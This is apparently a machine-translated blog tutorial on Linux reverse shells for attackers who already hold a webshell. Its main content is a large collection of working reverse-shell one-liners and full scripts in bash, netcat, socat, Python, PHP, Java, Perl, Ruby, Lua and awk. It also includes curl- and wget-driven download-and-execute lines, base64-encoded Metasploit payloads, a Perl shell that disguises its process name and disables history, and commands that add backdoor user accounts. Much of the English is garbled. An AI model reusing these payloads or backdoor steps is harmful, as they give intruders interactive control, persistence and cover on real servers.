当前位置:网站首页>Rebound shell principle and implementation
Rebound shell principle and implementation
2022-08-03 01:02:00 【wespten】
webshellA common method is hacked web server.在使用webshell对LinuxThe web server are in the process of the invasion of the right of,如果直接在webshellIn executing the exploit program,The lack of interactive environment,Can't continuous execute commands,Even mention right success cannot use.
因此,Hackers will first rebound ashell命令行窗口,To obtain a similar legal login the interactions of terminal,然后在shellTerminal to perform the exploit procedure right to mention,Your permissions from ordinary user permissions to super privileged user permissions.提权成功后,As a super user privilege,继续在shellTerminal to perform the subsequent attack command.因此,对Linux下反弹shellAttack defense requirements is necessary.
一、反弹shell简介
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转.
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接.远程桌面、web服务、ssh、telnet等等都是正向连接.If the accused end due to limited firewall、权限不足、端口被占用等情形,Positive connection cannot be used?So at this time the rebound connection played,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序.
为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形.
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接.远程桌面、web服务、ssh、telnet等等都是正向连接.
那么什么情况下Positive connection cannot be used?
有如下情况:
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了.
2.目标机器的ip动态改变,你不能持续控制.
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求.
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策.
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接.
二、Rebound principle
We are in the process of penetration testing often metlinux主机环境,而在获取linux主机shellIs one of the working content we often need to do is,Which often encounter the following scene.
场景一
We have won the host of awebshell,We'd like to get a can directly manipulate host virtual terminal,At the moment we first thought is ashell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有ncWe can also easily direct download and install a,The command is specific open listening.
(1) 安装netcat
Need to note the default here at alllinux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -eHere have been castrated,So we need to manually download the binary installation package,自己动手丰衣足食了,具体过程如下.
原生版本netcat链接:https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz
# 第一步:下载二进制netc安装包
[email protected]# wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz
# 第二步:解压安装包
[email protected]# tar -xvzf netcat-0.7.1.tar.gz
# 第三步:编译安装
[email protected]# ./configure
[email protected]# make
[email protected]# make install
[email protected]# make clean
# Specific compiler installation process can be directly seeINSTALLInstallation instructions file content...
# 第四步:在当前目录下运行nc帮助
[email protected]:/tmp/netcat-0.7.1# nc -h
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere: nc [options] hostname port [port] ...
listen for inbound: nc -l -p port [options] [hostname] [port] ...
tunnel to somewhere: nc -L hostname:port -p port [options]
Mandatory arguments to long options are mandatory for short options too.
Options:
-c, --close close connection on EOF from stdin
-e, --exec=PROGRAM program to exec after connect
-g, --gateway=LIST source-routing hop point[s], up to 8
-G, --pointer=NUM source-routing pointer: 4, 8, 12, ...
-h, --help display this help and exit
-i, --interval=SECS delay interval for lines sent, ports scanned
-l, --listen listen mode, for inbound connects
-L, --tunnel=ADDRESS:PORT forward local port to remote address
-n, --dont-resolve numeric-only IP addresses, no DNS
-o, --output=FILE output hexdump traffic to FILE (implies -x)
-p, --local-port=NUM local port number
-r, --randomize randomize local and remote ports
-s, --source=ADDRESS local source address (ip or hostname)
-t, --tcp TCP mode (default)
-T, --telnet answer using TELNET negotiation
-u, --udp UDP mode
-v, --verbose verbose (use twice to be more verbose)
-V, --version output version information and exit
-x, --hexdump hexdump incoming and outgoing traffic
-w, --wait=SECS timeout for connects and final net reads
-z, --zero zero-I/O mode (used for scanning)
Remote port number can also be specified as range. Example: '1-1024'So far we have installed a native version of the netcat工具,有了netcat -e参数,我们就可以将本地bashFull published to the network.
(2) 开启本地监听
# 开启本地8080端口监听,并将本地的bash发布出去.
nc -lvvp 8080 -t -e /bin/bash
#经过我测试 nc -lvnp 8080没有问题(3) 直接连接目标主机
[email protected]:~# nc 192.168.31.174 8080 -t -e /bin/bash
whoami
root
w
22:57:36 up 1:24, 0 users, load average: 0.52, 0.58, 0.59
USER TTY FROM [email protected] IDLE JCPU PCPU WHA命令详解:通过webshell我们可以使用ncCommand directly establish atcp 8080 的会话连接,然后将本地的bashThrough this session connection back on the target host(192.168.31.174).
不能使用-e选项时:
mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 4444
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/安装的NC版本有问题时:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
(4) shell反弹成功
We go back to the network host at this time,我们会发现tcp 8080Listening has been receiving connection to the remote host by,并成功获取shellVirtual terminal control environment.
场景二
The target host to a network host,并没有公网IP地址,We cannot launch from the network remote connection to the target host,At this time we use the method is to use forwebshellInitiate a rebound ofshell到外网,Then get a target hostshellTerminal control environment,而有关shellRebound method has many simple introduce several common methods in here.
bash 直接反弹
bash一句话shell反弹:The individual feels the best method is to use the method is to usebash结合重定向方法的一句话,具体命令如下.
(1)攻击端监听一个端口:
[[email protected] ~]# nc -lvp 8080
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080(2)受害端bashBounce a word:
bash -i >& /dev/tcp/192.168.31.41/8080 0>&1bash一句话命令详解
The following for the commonly usedbashBounce a word进行了拆分说明,具体内容如下.
1. nc -lvp 8080
-l 监听,-v 输出交互或出错信息,-p 端口.nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口.
2. bash -i
-i interactive.即产生一个交互式的shell(bash).
3. /dev/tcp/IP/PORT
特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口.打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据.
4.0>&1
Combining the standard input and standard output content,然后重定向给前面标准输出的内容.
其实以上bash反弹一句完整的解读过程就是:
bashCreates an interactive environment with local host initiate with the target host8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹环境.
(3)Attack the access to the victimbash
[[email protected] ~]# nc -lvp 8080
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.31.41
[[email protected] ~]# //攻击端已获得受害端的远程交互式shell
[[email protected] ~]# hostname
hostname
victim
场景三
在使用shellThe problems in the process of environment breeds out of,If you often virtual terminal environment before using various methods to obtain,会发现存在一个问题,Is even if we get the target virtual terminal control permissions,But often found interactive very poor,Echo is the discovery of this virtual information and interoperability is very poor and unstable,具体见情况有以下几个种.
问题1: 获取的虚拟终端没有交互性,We wanted to add account password,无法完成.
问题2:标准的错误输出无法显示,无法正常使用vim等文本编辑器等;
问题3: 获取的目标主机的虚拟终端使用非常不稳定,很容易断开连接.
linux In a word add account
Don't give me the interaction interface,The method is to use my script,Use a word to complete the account password to add,The account password to add a word,The author collected the following several ways.
chpasswd 方法
(1)执行语句
useradd newuser;echo "newuser:password"|chpasswd(2)操作实例
[email protected]:~# useradd guest;echo 'guest:123456'|chpasswd
[email protected]:~# vim /etc/shadow
sshd:*:17255:0:99999:7:::
pollinate:*:17255:0:99999:7:::
postgres:*:17390:0:99999:7:::
guest:$6$H0a/Nx.w$c2549uqXOULY4KvfCK6pTJQahhW7fuYYyHlo8HpnBxnUMtbXEbhgvFywwyPo5UsCbSUAMVvW9a7PsJB12TXPn.:17425:0:99999:7:::useradd -p 方法
(1) 执行语句
useradd -p encrypted_password newuser(2) 操作实例
[email protected]:~# useradd -p `openssl passwd 123456` guest
[email protected]:~# vim /etc/shadow
sshd:*:17255:0:99999:7:::
pollinate:*:17255:0:99999:7:::
postgres:*:17390:0:99999:7:::
guest:h8S5msqJLVTfo:17425:0:99999:7:::(3) The same method to other
The same method to different implementation a
[email protected]:~# useradd -p "$(openssl passwd 123456)" guest
[email protected]:~#Same way different implementation two
user_password="`openssl passwd 123456`"
useradd -p "$user_password" guestecho -e 方法
(1)执行语句
useradd newuwer;echo -e "123456n123456n" |passwd newuser(2) 操作实例
[email protected]:~# useradd test;echo -e "123456n123456n" |passwd test
Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully
[email protected]:~# vim /etc/shadow
sshd:*:17255:0:99999:7:::
pollinate:*:17255:0:99999:7:::
postgres:*:17390:0:99999:7:::
guest:h/UnnFIjqKogw:17425:0:99999:7:::
test:$6$rEjvwAb2$nJuZ1MDt0iKbW9nigp8g54ageiKBDuoLObLd1kWUC2FmLS0xCFFZmU4dzRtX/i2Ypm9uY6oKrSa9gzQ6qykzW1:17425:0:99999:7:::python Standard virtual terminal access
We get byshellOften unstable or not the cause of the interface,Often because we getshellIs not a standard virtual terminal,At this point we can actually usepythonTo obtain a standard virtual terminal environment.python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便.
python A word for standardshell
使用python A word for standardshell的具体命令如下:
# python -c "import pty;pty.spawn('/bin/bash')"命令详解:python The default contains apty的标准库.
1. -c
命令行执行
2.import pty
引入标准库pty
3.pty.spawn
使用pty的spawn方法调用/bin/bash获取一个标准的shell
实例演示
(1)开启监听;(2)反弹shell;(3)Session to establish the process is not repeated here demonstrates the,Posted the author get directly to the rebound in hereshellAfter the questions,如何通过python获取标准shellThe process of screenshots show as follows.
Although so far written by virtual terminal is not quite as good as the original terminal,But take the time to STH over and over again and then continue to perfect,Believe will do better.
You may at the time of penetration tests will find sometimes system command terminal are not allowed to directly access,那么这个时候用PythonVirtualization is a terminal believe will make you shine at the moment.
三、反弹shell实现方式
The following script rebound word usage is the same,As long as the strike in the local open TCP 8080监听,Then on the distal drone one, run the following script statement,Can the dronebashBack on the attack host8080端口(Premise condition is, of course, should have on the target host response script analytical environment support,才可以使用,Sure that you are understand).
通常使用的有netcat工具反弹、 socat反弹、bash 直接反弹、 python脚本反弹、 JAVA脚本反弹、 perlScript rebound, etc.
1、bash反弹shell
第一步:攻击机【192.168.67.188】, Open the local port to monitor nc -lvvp 8888:
第二步:The target machine【192.168.67.190】
bash -i >& /dev/tcp/192.168.67.188/8888 0>&1
Or
bash -c 'sh -i &>/dev/tcp/192.168.67.188/8888 0>&1'bash -i是打开一个交互的bash,产生一个bash交互环境.本地打开bash将标准输出、标准错误输出、标准输入通过socket链接重定向至远程.
After perform the attack command,Return to attack aircraft can see reboundshell成功.execCommand can be used to replace the currentshell;换句话说,并没有启动子shell,Use this command when any existing environment variables will be cleared,And restart the ashell.
exec 5<>/dev/tcp/evil.com/8080
cat <&5 | while read line; do $line 2>&5 >&5; done另外还可以是:
exec 3<>/dev/tcp/www.google.com/80
echo -e "GET / HTTP/1.1\r\nhost: http://www.google.com\r\nConnection: close\r\n\r\n" >&3
cat <&3exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1研究表明,exec 2>&0即可,不需要/bin/bash,然后跟上0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196In the local monitoring rebound success.
2、socat Bounce a word
Socat是Linux 下一个多功能的网络工具,名字来由是” Socket CAT”,So you can see it is based onsocket,To be able to STH over and over againsocketMany many things related to ,其功能与netcat类似,不过据说可以看做netcat的加强版,事实上的确也是如此,ncEmergency longer nobody maintenance,Does seem to be some old,我这里只简单的介绍下怎么使用它开启监听和反弹shell,Other details can learn to see article at the end of the reference.
有关socat二进制可执行文件,You can to this link to download:https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
第一步:Attacks on open listening
# socat TCP-LISTEN:12345 -
第二步:靶机上运行socat反弹shell
# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.174:12345
第三步:shell 反弹成功
3、python脚本反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
显示为sh-4.1#
The other form:
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
py脚本:
#!/usr/bin/python
#-*- coding: utf-8 -*-
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.20.151",7777)) #更改localhost为自己的外网ip,端口任意
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])另外Metasploit版的代码:
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))base64解码:
import socket,struct
s=socket.socket(2,1)
s.connect(('192.168.90.1',1234))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
d+=s.recv(4096)
exec(d,{'s':s})4、php 脚本反弹
php -r '$sock=fsockopen("192.168.31.41",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
The other form:
开启kail监听端口
成功反弹,But there will bephp保存成txtFile to rebound,若为phpFile will not rebound successful.
php脚本:
<?php
$sock=fsockopen("192.168.20.151",7777);//localhost为自己的外网ip,端口任意
exec("/bin/sh -i <&3 >&3 2>&3");
?>5、Java 脚本反弹
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()msf使用为:use payload/java/shell/reverse_tcp
Bye a long code:
import java.io.*;
import java.net.Socket;
import java.util.*;
import java.util.regex.*;
import java.applet.Applet;
public class poc extends Applet{
/**
* Author: daniel baier alias duddits
* Licens: GPL
* Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher
* Version: 0.1 alpha release
*/
public String cd(String start, File currentDir) {
File fullPath = new File(currentDir.getAbsolutePath());
String sparent = fullPath.getAbsoluteFile().toString();
return sparent + "/" + start;
}
@SuppressWarnings("unchecked")
public void init() {
poc rs = new poc();
PrintWriter out;
try {
Socket clientSocket = new Socket("192.168.5.222",10003);
out = new PrintWriter(clientSocket.getOutputStream(), true);
out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");
boolean run = true;
String s;
BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));
String startort = "/";
while (run) {
String z1;
File f = new File(startort);
out.println(f.getAbsolutePath() + "> ");
s = br.readLine();
z1 = s;
Pattern pcd = Pattern.compile("^cd\\s");
Matcher mcd = pcd.matcher(z1);
String[] teile1 = pcd.split(z1);
if (s.equals("exit")) {
run = false;
}else if (s.equals(null) || s.equals("cmd") || s.equals("")) {
} else if(mcd.find()){
try {
String cds = rs.cd(teile1[1], new File(startort));
startort = cds;
} catch (Exception verz) {
out.println("Path " + teile1[1]
+ " not found.");
}
}else {
String z2;
z2 = s;
Pattern pstring = Pattern.compile("\\s");
String[] plist = pstring.split(z2);
try {
LinkedList slist = new LinkedList();
for (int i = 0; i < plist.length; i++) {
slist.add(plist[i]);
}
ProcessBuilder builder = new ProcessBuilder(slist);
builder.directory(new File(startort));
Process p = builder.start();
Scanner se = new Scanner(p.getInputStream());
if (!se.hasNext()) {
Scanner sa = new Scanner(p.getErrorStream());
while (sa.hasNext()) {
out.println(sa.nextLine());
}
}
while (se.hasNext()) {
out.println(se.nextLine());
}
} catch (Exception err) {
out.println(f.getAbsolutePath() + "> Command "
+ s + " failed!");
out.println(f.getAbsolutePath() +"> Please try cmd /c "+ s+" or bash -c " +s+" if this command is an shell buildin.");
}
}
}
if(!clientSocket.isConnected()){
run = false;
out.flush();
out.close();
}
} catch (Exception io) {
//System.err.println("Connection refused by peer");
}
}
}6、perl 脚本反弹
perl -e 'use Socket;$i="192.168.31.41";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
使用这条命令,唯一的不同是提示符变成了sh-4.1#,实现原理和前面的bash差不多,Perl还是很强大的.
不依赖于/bin/sh的shell,这条语句比上面的更为简短,而且确实不需要依赖/bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
系统运行windows时,You will be prompted nowwindowsTemporarily don'tPerl.
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
完整的Perl的反弹脚本:
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";
# Where to send the reverse shell. Change these.
my $ip = '127.0.0.1';
my $port = 1234;
# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);
# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";
# Change the process name to be less conspicious
$0 = "[httpd]";
# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
if ($auth) {
unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
cgiprint("ERROR: Your client isn't authorised to view this page");
cgiexit();
}
}
} elsif ($auth) {
cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
cgiexit(0);
}
# Background and dissociate from parent process if required
if ($daemon) {
my $pid = fork();
if ($pid) {
cgiexit(0); # parent exits
}
setsid();
chdir('/');
umask(0);
}
# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
cgiprint("Sent reverse shell to $ip:$port");
cgiprintpage();
} else {
cgiprint("Couldn't open reverse shell to $ip:$port: $!");
cgiexit();
}
# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));
# Wrapper around print
sub cgiprint {
my $line = shift;
$line .= "<p>\n";
$global_page .= $line;
}
# Wrapper around exit
sub cgiexit {
cgiprintpage();
exit 0; # 0 to ensure we don't give a 500 response.
}
# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}7、Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i<&%d >&%d 2>&%d",f,f,f)'不依赖于/bin/sh的shell:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
如果目标系统运行Windows:
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Of course, we are very familiar withMSFRebound module is insideshell的:
#!/usr/bin/env ruby
require 'socket'
require 'open3'
#Set the Remote Host IP
RHOST = "192.168.1.10"
#Set the Remote Host Port
PORT = "6667"
#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
sleep 20
retry
end
#Runs the commands you type and sends you back the stdout and stderr.
begin
while line = sock.gets
Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
IO.copy_stream(stdout_and_stderr, sock)
end
end
rescue
retry
end8、lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.1.1.19','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"msf反弹:
use payload/cmd/unix/reverse_lua9、Telnet
nc不可用或/dev/tcp不可用时.
mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
这里mknod是创建特殊文件-设备文件.
10、Xterm
首先开启Xserver,TCP 6001:
Xnest :1 # Note: The command starts with uppercase XPermissions granted to the target even back:
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X ServerIf you want to let anyone even a:
xhost + # Run this INSIDE the spawned xterm on the open X Server假设xterm已安装,Even you backXserver:
xterm -display attackerip:1或者:
$ DISPLAY=attackerip:0 xterm11、gawk
#!/usr/bin/gawk -f
BEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}
12、AWK反弹
Attack machine监听,在收到shell的时候不可以输入enter,不然会断开.
awk 'BEGIN{s="/inet/tcp/0/x.x.x.x/8080";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'13、curl反弹shell
The premise to usebashUse a wordcurl反弹shell.
In the presence of the command execution on the servercurl ip|bash,该ip的indexDocument containsbash一句话,就可以反弹shell.
For example, in your own serverindexWrite a sentence:
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151Is the server as a listener port used to bounceshell.
There is a word,利用curl反弹.
kali开启监听:
14、wgetWay to bounce back
利用wget进行下载执行:
wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.phpUse the following postphp进行反弹.
开启监听:
成功反弹shell.
12、msfvenom Access to bounce a word
Found in the learning process is actually a powerfulMSF框架也为我们提供了生成一句话反弹shell的工具,即msfvenom.绝对的实用,当我们不记得前面说的所有反弹shell的反弹语句时,只要我们有Metasploit,We can use at any timemsfvenom -l 来查询生成我们所需要的各类命令行一句话,The specific method of use for each reader masters to collect the following.
查询 payload 具体路径:
我们直接可以使用 msfvenom -l 结合关键字过滤(如cmd/unix/reverse),找出我们需要的各类Bounce a wordpayload的路径信息.
# msfvenom -l payloads 'cmd/unix/reverse'
See the above screenshot,我们可以看到msfvenom支持生成反弹shell一句话的类型非常丰富,这里几乎是应有尽有,大家可以依据渗透测试对象自行选择使用.
bash Rebound to generate a word:
According to find out in front of the command to generate a wordpayload路径,We use the following command to generate a rebound a word,然后复制粘贴到靶机上运行即可.
# [email protected]:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=12345 R
阉割版ncRebound to generate a word:
# [email protected]:~# msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R
The rest is the generatedpayload Bounce a word directly copy the drone directly run the rally ashell出来.
msfvenom 使用实例:
(1) Open the attack to monitor
In the attack on the open local TCP 12345 端口监听,Ready to listen on the rebound in session,See below screenshot you can see the localTCP 12345 Port monitor is on.
(2) 获取python一句话
We can use at this timeMSFThe framework platformmsfvenom Tools to automatically generate apython Bounce a word,Specific operation, please attend the following screenshots.(Of course, the premise of here is installed on drone havepython环境,Now the default generallinuxRelease the default installedpython环境.)
(3) 靶机上运行python一句话
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAgLCBzdWJwcm9jZXNzICAgICAgICAsIG9zICAgICAgICA7ICBob3N0PSIxOTIuMTY4LjMxLjIwMCIgICAgICAgIDsgIHBvcnQ9MTIzNDUgICAgICAgIDsgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICBzLmNvbm5lY3QoKGhvc3QgICAgICAgICwgcG9ydCkpICAgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICwgMCkgICAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgLCAxKSAgICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAsIDIpICAgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
直接将上面msfvenon 生成的 python Sentence is copied to the targetwebshell上运行即可,I'm here to demonstrate convenient,Posted a direct usekaliAs a drone operation screenshot.
(4) Rebound against listening to accept case
边栏推荐
猜你喜欢
随机推荐
Software testing pen questions 1 (with answers)
TCP三次握手与四次挥手
The interviewer asked me: delete library, in addition to run do?
【TypeScript】深入学习TypeScript模块化
word操作:单独调整英文字体
学习基因富集工具DAVID(3)
What is the core business model of the "advertising e-commerce" that has recently become popular in the circle of friends, and is the advertising revenue really reliable?
B站回应“HR 称核心用户都是 Loser”:该面试官去年底已被劝退,会吸取教训加强管理
Kubernetes 进阶训练营 网络
测试人生 | 阿里实习 90 天:从实习生的视角谈谈个人成长
kubernetes pod podsecurityPolicies(PSP)
Towards a General Purpose CNN for Long Range Dependencies in ND
TDengine 在中天钢铁 GPS、 AIS 调度中的落地
第十章 时序与延迟
matplotlib绘图的核心原理讲解(超详细)
数字化转型巨浪拍岸,成长型企业如何“渡河”?
Ruoyi integrates minio to realize distributed file storage
浅读一下dotenv的主干逻辑的源码
go 反射 reflect 包
非关系型数据库MongoDB简介和部署